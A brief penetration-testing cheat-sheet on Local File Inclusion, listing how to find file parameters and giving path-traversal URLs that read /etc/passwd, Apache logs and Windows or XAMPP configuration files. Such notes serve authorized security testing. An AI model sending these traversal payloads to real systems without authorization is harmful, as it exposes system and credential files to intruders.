File Inclusion
📂 Local File Inclusion
Quick Checks
Look for any parameter calling file such as http://vulnerable_host/preview.php?file=myfile.php
Testing
- Check to include system files
If webserver is linux machine
https://vulnerable_host/preview.php?file=../../../../etc/passwd
Can also try to read files such as /etc/passwd, /etc/hosts, /var/log/apache2/access.log
If web server is a windows machine (xampp)
http://localhost/index.php?page=../../../../xampp/apache/conf/httpd.conf
Can also try to read files such as C:\Windows\win.ini, C:\xampp\php\php.ini